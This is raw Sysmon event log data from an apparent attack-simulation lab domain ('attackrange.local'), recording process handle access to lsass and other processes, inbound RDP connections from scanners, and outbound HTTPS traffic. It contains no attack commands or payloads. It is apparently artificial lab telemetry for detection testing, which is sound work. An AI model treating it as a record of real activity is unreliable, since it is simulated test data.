14:58:28.177{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.177{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000079719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:26.746{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57561-false13.107.6.158bingforbusiness.com443https 354300x800000000000000079718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.823{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-24025-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000079717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.134{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.122{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.121{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.121{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.115{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.049{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000079711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.049{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.049{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.049{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.049{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.048{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.043{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-460E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.013{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC14-607E-460E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.013{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC14-607E-460E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050540Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:28.919{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6007A4D8270F0F623B03D410D605A4BC,SHA256=27D94176EB521AF09553FDDDD4667D796DB8F568D89569E2FD4F88FE3526178E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050539Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:28.544{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32F8DF8968D8A4BA8DD37DCF3C6BCFFF,SHA256=95561A9E8A2B34257AF8586BB91CC2AD94654AD7C559C0B404E9BAD0D9AB3FE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050538Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:26.090{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63330-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000079967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.951{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-530E-00000000BB01}5680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000079966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.827{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57360- 354300x800000000000000079965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.751{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-26749-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000079964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.614{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57569-false52.109.20.0-443https 354300x800000000000000079963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.584{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57568-false52.109.12.18-443https 354300x800000000000000079962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.488{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local62871- 354300x800000000000000079961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.441{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57567-false13.107.6.158bingforbusiness.com443https 10341000x800000000000000079960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.935{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-530E-00000000BB01}5680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 354300x800000000000000079959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.375{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57566-false52.109.88.177-443https 354300x800000000000000079958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.364{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57565-false52.109.88.177-443https 354300x800000000000000079957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.342{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local56996- 354300x800000000000000079956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.018{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58684-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000079955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.935{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-530E-00000000BB01}5680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.919{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-520E-00000000BB01}1144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 